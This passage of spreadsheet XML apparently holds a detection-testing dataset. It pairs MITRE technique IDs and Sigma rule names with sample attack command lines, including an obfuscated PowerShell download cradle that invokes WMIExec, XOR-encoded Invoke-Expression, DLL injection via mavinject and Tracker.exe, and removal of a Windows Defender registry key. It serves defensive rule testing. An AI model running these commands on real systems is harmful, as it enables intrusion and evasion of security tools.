        <v>0</v>
      </c>
      <c r="G2568" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2568" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2568" s="43" t="n"/>
      <c r="J2568" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2568" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2569" ht="15.75" customHeight="1" s="42">
      <c r="A2569" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B2569" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_downgrade_attack</t>
        </is>
      </c>
      <c r="C2569" s="43" t="inlineStr">
        <is>
          <t>Potential PowerShell Downgrade Attack</t>
        </is>
      </c>
      <c r="D2569" s="43" t="inlineStr">
        <is>
          <t>b3512211-c67e-4707-bedc-66efc7848863</t>
        </is>
      </c>
      <c r="E2569" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Version 2 -Command "Write-Host 'Bypass'"</t>
        </is>
      </c>
      <c r="F2569" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2569" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2569" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2569" s="43" t="n"/>
      <c r="J2569" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2569" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2570" ht="15.75" customHeight="1" s="42">
      <c r="A2570" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B2570" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_downgrade_attack</t>
        </is>
      </c>
      <c r="C2570" s="43" t="inlineStr">
        <is>
          <t>Potential PowerShell Downgrade Attack</t>
        </is>
      </c>
      <c r="D2570" s="43" t="inlineStr">
        <is>
          <t>b3512211-c67e-4707-bedc-66efc7848863</t>
        </is>
      </c>
      <c r="E2570" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ver 2 -Command "Write-Host 'Bypass'"</t>
        </is>
      </c>
      <c r="F2570" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2570" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2570" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2570" s="43" t="n"/>
      <c r="J2570" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2570" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2571" ht="15.75" customHeight="1" s="42">
      <c r="A2571" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B2571" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_downgrade_attack</t>
        </is>
      </c>
      <c r="C2571" s="43" t="inlineStr">
        <is>
          <t>Potential PowerShell Downgrade Attack</t>
        </is>
      </c>
      <c r="D2571" s="43" t="inlineStr">
        <is>
          <t>b3512211-c67e-4707-bedc-66efc7848863</t>
        </is>
      </c>
      <c r="E2571" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -versi 2 -Command "Write-Host 'Bypass'"</t>
        </is>
      </c>
      <c r="F2571" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2571" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2571" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2571" s="43" t="n"/>
      <c r="J2571" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2571" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2572" ht="15.75" customHeight="1" s="42">
      <c r="A2572" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B2572" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_downgrade_attack</t>
        </is>
      </c>
      <c r="C2572" s="43" t="inlineStr">
        <is>
          <t>Potential PowerShell Downgrade Attack</t>
        </is>
      </c>
      <c r="D2572" s="43" t="inlineStr">
        <is>
          <t>b3512211-c67e-4707-bedc-66efc7848863</t>
        </is>
      </c>
      <c r="E2572" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -versio 2 -Command "Write-Host 'Bypass'"</t>
        </is>
      </c>
      <c r="F2572" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2572" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2572" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2572" s="43" t="n"/>
      <c r="J2572" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2572" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2573" ht="15.75" customHeight="1" s="42">
      <c r="A2573" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B2573" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_downgrade_attack</t>
        </is>
      </c>
      <c r="C2573" s="43" t="inlineStr">
        <is>
          <t>Potential PowerShell Downgrade Attack</t>
        </is>
      </c>
      <c r="D2573" s="43" t="inlineStr">
        <is>
          <t>b3512211-c67e-4707-bedc-66efc7848863</t>
        </is>
      </c>
      <c r="E2573" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -version 2 -Command "Write-Host 'Bypass'"</t>
        </is>
      </c>
      <c r="F2573" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2573" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2573" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2573" s="43" t="n"/>
      <c r="J2573" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2573" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2574" ht="15.75" customHeight="1" s="42">
      <c r="A2574" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B2574" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_download_cradle_obfuscated</t>
        </is>
      </c>
      <c r="C2574" s="43" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell OneLiner Execution</t>
        </is>
      </c>
      <c r="D2574" s="43" t="inlineStr">
        <is>
          <t>44e24481-6202-4c62-9127-5a0ae8e3fe3d</t>
        </is>
      </c>
      <c r="E2574" s="43" t="inlineStr">
        <is>
          <t>powershell -nop -noni -ep bypass -w h -c "$u=('http://127.0.0.1:1337/'|%{IRM $_});&amp;(''.SubString.ToString()[67,72,64]-Join'')($u); Import-Module Invoke-WMIExec.ps1; Invoke-WMIExec"</t>
        </is>
      </c>
      <c r="F2574" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2574" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2574" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2574" s="43" t="n"/>
      <c r="J2574" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2574" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2575" ht="15.75" customHeight="1" s="42">
      <c r="A2575" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B2575" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_download_cradle_obfuscated</t>
        </is>
      </c>
      <c r="C2575" s="43" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell OneLiner Execution</t>
        </is>
      </c>
      <c r="D2575" s="43" t="inlineStr">
        <is>
          <t>44e24481-6202-4c62-9127-5a0ae8e3fe3d</t>
        </is>
      </c>
      <c r="E2575" s="43" t="inlineStr">
        <is>
          <t>powershell -nop -noni -ep bypass -w h -c "$u=('http://127.0.0.1:1337/'|ForEach-Object{IRM $_});&amp;(''.SubString.ToString()[67,72,64]-Join'')($u); Import-Module Invoke-WMIExec.ps1; Invoke-WMIExec"</t>
        </is>
      </c>
      <c r="F2575" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2575" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2575" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2575" s="43" t="n"/>
      <c r="J2575" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2575" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2576" ht="15.75" customHeight="1" s="42">
      <c r="A2576" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B2576" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_download_cradle_obfuscated</t>
        </is>
      </c>
      <c r="C2576" s="43" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell OneLiner Execution</t>
        </is>
      </c>
      <c r="D2576" s="43" t="inlineStr">
        <is>
          <t>44e24481-6202-4c62-9127-5a0ae8e3fe3d</t>
        </is>
      </c>
      <c r="E2576" s="43" t="inlineStr">
        <is>
          <t>powershell -nop -noni -ep bypass -w h -c "$u=('http://127.0.0.1:1337/'|ForEach-Object{Invoke-RestMethod $_});&amp;(''.SubString.ToString()[67,72,64]-Join'')($u); Import-Module Invoke-WMIExec.ps1; Invoke-WMIExec"</t>
        </is>
      </c>
      <c r="F2576" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2576" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2576" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2576" s="43" t="n"/>
      <c r="J2576" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2576" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2577" ht="15.75" customHeight="1" s="42">
      <c r="A2577" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B2577" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_download_cradle_obfuscated</t>
        </is>
      </c>
      <c r="C2577" s="43" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell OneLiner Execution</t>
        </is>
      </c>
      <c r="D2577" s="43" t="inlineStr">
        <is>
          <t>44e24481-6202-4c62-9127-5a0ae8e3fe3d</t>
        </is>
      </c>
      <c r="E2577" s="43" t="inlineStr">
        <is>
          <t>powershell -nop -noni -ep bypass -w h -c "$u=('http://127.0.0.1:1337/'|ForEach-Object{Invoke-RestMethod $_});&amp;(''.SubString.ToString()[67,72,64]-Join'')($u); Import-Module C:\Users\EXAMPLE\Invoke-WMIExec.ps1; Invoke-WMIExec"</t>
        </is>
      </c>
      <c r="F2577" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2577" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2577" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2577" s="43" t="n"/>
      <c r="J2577" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2577" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2578" ht="15.75" customHeight="1" s="42">
      <c r="A2578" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B2578" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_obfuscation_via_utf8</t>
        </is>
      </c>
      <c r="C2578" s="43" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via WCHAR/CHAR</t>
        </is>
      </c>
      <c r="D2578" s="43" t="inlineStr">
        <is>
          <t>e312efd0-35a1-407f-8439-b8d434b438a6</t>
        </is>
      </c>
      <c r="E2578" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Write-Host (\"[char]\" 0x41)"</t>
        </is>
      </c>
      <c r="F2578" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2578" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2578" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2578" s="43" t="n"/>
      <c r="J2578" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2578" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2579" ht="15.75" customHeight="1" s="42">
      <c r="A2579" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B2579" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_obfuscation_via_utf8</t>
        </is>
      </c>
      <c r="C2579" s="43" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via WCHAR/CHAR</t>
        </is>
      </c>
      <c r="D2579" s="43" t="inlineStr">
        <is>
          <t>e312efd0-35a1-407f-8439-b8d434b438a6</t>
        </is>
      </c>
      <c r="E2579" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Write-Host ([System.Char]0x41)"</t>
        </is>
      </c>
      <c r="F2579" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2579" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2579" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2579" s="43" t="n"/>
      <c r="J2579" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2579" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2580" ht="15.75" customHeight="1" s="42">
      <c r="A2580" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B2580" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_obfuscation_via_utf8</t>
        </is>
      </c>
      <c r="C2580" s="43" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via WCHAR/CHAR</t>
        </is>
      </c>
      <c r="D2580" s="43" t="inlineStr">
        <is>
          <t>e312efd0-35a1-407f-8439-b8d434b438a6</t>
        </is>
      </c>
      <c r="E2580" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Write-Host (\"[char]\" 65)"</t>
        </is>
      </c>
      <c r="F2580" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2580" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2580" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2580" s="43" t="n"/>
      <c r="J2580" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2580" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2581" ht="15.75" customHeight="1" s="42">
      <c r="A2581" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B2581" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_obfuscation_via_utf8</t>
        </is>
      </c>
      <c r="C2581" s="43" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via WCHAR/CHAR</t>
        </is>
      </c>
      <c r="D2581" s="43" t="inlineStr">
        <is>
          <t>e312efd0-35a1-407f-8439-b8d434b438a6</t>
        </is>
      </c>
      <c r="E2581" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Write-Host ([char]([Convert]::ToInt32(\"A\", 16)))"</t>
        </is>
      </c>
      <c r="F2581" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2581" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2581" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2581" s="43" t="n"/>
      <c r="J2581" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2581" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2582" ht="15.75" customHeight="1" s="42">
      <c r="A2582" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B2582" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_obfuscation_via_utf8</t>
        </is>
      </c>
      <c r="C2582" s="43" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via WCHAR/CHAR</t>
        </is>
      </c>
      <c r="D2582" s="43" t="inlineStr">
        <is>
          <t>e312efd0-35a1-407f-8439-b8d434b438a6</t>
        </is>
      </c>
      <c r="E2582" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Write-Host ([char](0x41))"</t>
        </is>
      </c>
      <c r="F2582" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2582" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2582" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2582" s="43" t="n"/>
      <c r="J2582" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2582" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2583" ht="15.75" customHeight="1" s="42">
      <c r="A2583" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B2583" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_xor_commandline</t>
        </is>
      </c>
      <c r="C2583" s="43" t="inlineStr">
        <is>
          <t>Suspicious XOR Encoded PowerShell Command</t>
        </is>
      </c>
      <c r="D2583" s="43" t="inlineStr">
        <is>
          <t>bb780e0c-16cf-4383-8383-1e5471db6cf9</t>
        </is>
      </c>
      <c r="E2583" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "`$bytes = 105,102; `$res = ''; `$bytes | % { `$res += [Convert]::ToChar(`$_ -bxor 5) }; Invoke-Expression `$res"</t>
        </is>
      </c>
      <c r="F2583" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2583" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2583" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2583" s="43" t="n"/>
      <c r="J2583" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2583" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2584" ht="15.75" customHeight="1" s="42">
      <c r="A2584" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B2584" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_xor_commandline</t>
        </is>
      </c>
      <c r="C2584" s="43" t="inlineStr">
        <is>
          <t>Suspicious XOR Encoded PowerShell Command</t>
        </is>
      </c>
      <c r="D2584" s="43" t="inlineStr">
        <is>
          <t>bb780e0c-16cf-4383-8383-1e5471db6cf9</t>
        </is>
      </c>
      <c r="E2584" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "`$k=42; `$arr=100,101; `$res=''; `$arr | % { `$res += [string](`$_ -bxor `$k) }; Write-Host `$res"</t>
        </is>
      </c>
      <c r="F2584" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2584" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2584" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2584" s="43" t="n"/>
      <c r="J2584" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2584" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2585" ht="15.75" customHeight="1" s="42">
      <c r="A2585" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B2585" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_xor_commandline</t>
        </is>
      </c>
      <c r="C2585" s="43" t="inlineStr">
        <is>
          <t>Suspicious XOR Encoded PowerShell Command</t>
        </is>
      </c>
      <c r="D2585" s="43" t="inlineStr">
        <is>
          <t>bb780e0c-16cf-4383-8383-1e5471db6cf9</t>
        </is>
      </c>
      <c r="E2585" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -EncodedCommand JABzAGMAcgBpAHAAdAAgAD0AIAAiAC4ALgAuACIAOwAgACQAZABlAGMAbwBkAGUAZAAgAD0AIAAkAHMAYwByAGkAcAB0ACAAfAAgICUAIAB7ACAAWwBjAGgAYQByAF0AKAAkAF8AIAAtAGIAeABvAHIAIAAyADUANQApACAAfQA7ACAASQBFAFgAIAAtAGoAbwBpAG4AIAAkAGQAZQBjAG8AZABlAGQA</t>
        </is>
      </c>
      <c r="F2585" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2585" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2585" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2585" s="43" t="n"/>
      <c r="J2585" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2585" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2586" ht="15.75" customHeight="1" s="42">
      <c r="A2586" s="43" t="inlineStr">
        <is>
          <t>t1218.002</t>
        </is>
      </c>
      <c r="B2586" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_control_panel_item</t>
        </is>
      </c>
      <c r="C2586" s="43" t="inlineStr">
        <is>
          <t>Control Panel Items</t>
        </is>
      </c>
      <c r="D2586" s="43" t="inlineStr">
        <is>
          <t>0ba863e6-def5-4e50-9cea-4dd8c7dc46a4</t>
        </is>
      </c>
      <c r="E2586" s="43" t="inlineStr">
        <is>
          <t>control.exe malicious.cpl</t>
        </is>
      </c>
      <c r="F2586" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2586" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2586" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2586" s="43" t="n"/>
      <c r="J2586" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2586" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2587" ht="15.75" customHeight="1" s="42">
      <c r="A2587" s="43" t="inlineStr">
        <is>
          <t>t1218.002</t>
        </is>
      </c>
      <c r="B2587" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_control_panel_item</t>
        </is>
      </c>
      <c r="C2587" s="43" t="inlineStr">
        <is>
          <t>Control Panel Items</t>
        </is>
      </c>
      <c r="D2587" s="43" t="inlineStr">
        <is>
          <t>0ba863e6-def5-4e50-9cea-4dd8c7dc46a4</t>
        </is>
      </c>
      <c r="E2587" s="43" t="inlineStr">
        <is>
          <t>control.exe payload.dll</t>
        </is>
      </c>
      <c r="F2587" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2587" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2587" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2587" s="43" t="n"/>
      <c r="J2587" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2587" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2588" ht="15.75" customHeight="1" s="42">
      <c r="A2588" s="43" t="inlineStr">
        <is>
          <t>t1027.004</t>
        </is>
      </c>
      <c r="B2588" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_csc_susp_dynamic_compilation</t>
        </is>
      </c>
      <c r="C2588" s="43" t="inlineStr">
        <is>
          <t>Dynamic .NET Compilation Via Csc.EXE</t>
        </is>
      </c>
      <c r="D2588" s="43" t="inlineStr">
        <is>
          <t>dcaa3f04-70c3-427a-80b4-b870d73c94c4</t>
        </is>
      </c>
      <c r="E2588" s="43" t="inlineStr">
        <is>
          <t>C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /fullpaths /noconfig @"C:\Users\thaim\AppData\Local\Temp\akew4mzz\akew4mzz.cmdline"</t>
        </is>
      </c>
      <c r="F2588" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2588" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2588" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2588" s="43" t="n"/>
      <c r="J2588" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2588" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2589" ht="15.75" customHeight="1" s="42">
      <c r="A2589" s="43" t="inlineStr">
        <is>
          <t>t1055.001</t>
        </is>
      </c>
      <c r="B2589" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_dctask64_arbitrary_command_and_dll_execution</t>
        </is>
      </c>
      <c r="C2589" s="43" t="inlineStr">
        <is>
          <t>ManageEngine Endpoint Central Dctask64.EXE Potential Abuse</t>
        </is>
      </c>
      <c r="D2589" s="43" t="inlineStr">
        <is>
          <t>6345b048-8441-43a7-9bed-541133633d7a</t>
        </is>
      </c>
      <c r="E2589" s="43" t="inlineStr">
        <is>
          <t>dctask64.exe -executecmd64:whoami</t>
        </is>
      </c>
      <c r="F2589" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2589" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2589" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2589" s="43" t="n"/>
      <c r="J2589" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2589" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2590" ht="15.75" customHeight="1" s="42">
      <c r="A2590" s="43" t="inlineStr">
        <is>
          <t>t1055.001</t>
        </is>
      </c>
      <c r="B2590" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_dctask64_arbitrary_command_and_dll_execution</t>
        </is>
      </c>
      <c r="C2590" s="43" t="inlineStr">
        <is>
          <t>ManageEngine Endpoint Central Dctask64.EXE Potential Abuse</t>
        </is>
      </c>
      <c r="D2590" s="43" t="inlineStr">
        <is>
          <t>6345b048-8441-43a7-9bed-541133633d7a</t>
        </is>
      </c>
      <c r="E2590" s="43" t="inlineStr">
        <is>
          <t>dctask64.exe -"execute"cmd64 "whoami"</t>
        </is>
      </c>
      <c r="F2590" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2590" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2590" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2590" s="43" t="n"/>
      <c r="J2590" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2590" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2591" ht="15.75" customHeight="1" s="42">
      <c r="A2591" s="43" t="inlineStr">
        <is>
          <t>t1055.001</t>
        </is>
      </c>
      <c r="B2591" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_dctask64_arbitrary_command_and_dll_execution</t>
        </is>
      </c>
      <c r="C2591" s="43" t="inlineStr">
        <is>
          <t>ManageEngine Endpoint Central Dctask64.EXE Potential Abuse</t>
        </is>
      </c>
      <c r="D2591" s="43" t="inlineStr">
        <is>
          <t>6345b048-8441-43a7-9bed-541133633d7a</t>
        </is>
      </c>
      <c r="E2591" s="43" t="inlineStr">
        <is>
          <t>dctask64.exe -executecmd64 "whoami" &gt; NUL</t>
        </is>
      </c>
      <c r="F2591" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2591" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2591" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2591" s="43" t="n"/>
      <c r="J2591" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2591" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2592" ht="15.75" customHeight="1" s="42">
      <c r="A2592" s="43" t="inlineStr">
        <is>
          <t>t1055.001</t>
        </is>
      </c>
      <c r="B2592" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_mavinject_process_injection</t>
        </is>
      </c>
      <c r="C2592" s="43" t="inlineStr">
        <is>
          <t>Mavinject Inject DLL Into Running Process</t>
        </is>
      </c>
      <c r="D2592" s="43" t="inlineStr">
        <is>
          <t>4f73421b-5a0b-4bbf-a892-5a7fb99bea66</t>
        </is>
      </c>
      <c r="E2592" s="43" t="inlineStr">
        <is>
          <t>mavinject.exe 1234 /INJECTRUNNING\"tevil.dll"</t>
        </is>
      </c>
      <c r="F2592" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2592" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2592" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2592" s="43" t="n"/>
      <c r="J2592" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2592" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2593" ht="15.75" customHeight="1" s="42">
      <c r="A2593" s="43" t="inlineStr">
        <is>
          <t>t1055.001</t>
        </is>
      </c>
      <c r="B2593" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_tracker</t>
        </is>
      </c>
      <c r="C2593" s="43" t="inlineStr">
        <is>
          <t>Potential DLL Injection Or Execution Using Tracker.exe</t>
        </is>
      </c>
      <c r="D2593" s="43" t="inlineStr">
        <is>
          <t>148431ce-4b70-403d-8525-fcc2993f29ea</t>
        </is>
      </c>
      <c r="E2593" s="43" t="inlineStr">
        <is>
          <t>Tracker.exe /ERRORREPORT:PROMPT /d malicious.dll /c calc.exe</t>
        </is>
      </c>
      <c r="F2593" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2593" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2593" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2593" s="43" t="n"/>
      <c r="J2593" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2593" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2594" ht="15.75" customHeight="1" s="42">
      <c r="A2594" s="43" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B2594" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_defender_remove_context_menu</t>
        </is>
      </c>
      <c r="C2594" s="43" t="inlineStr">
        <is>
          <t>Windows Defender Context Menu Removed</t>
        </is>
      </c>
      <c r="D2594" s="43" t="inlineStr">
        <is>
          <t>b9e8c7d6-a5f4-4e3d-8b1a-9f0c8d7e6a5b</t>
        </is>
      </c>
      <c r="E2594" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "rm 'HKCR\*\shellex\ContextMenuHandlers\EPP'" | Out-Null</t>
        </is>
      </c>
      <c r="F2594" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2594" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2594" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2594" s="43" t="n"/>
      <c r="J2594" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2594" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2595" ht="15.75" customHeight="1" s="42">
      <c r="A2595" s="43" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B2595" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_defender_remove_context_menu</t>
        </is>
      </c>
      <c r="C2595" s="43" t="inlineStr">
        <is>
          <t>Windows Defender Context Menu Removed</t>
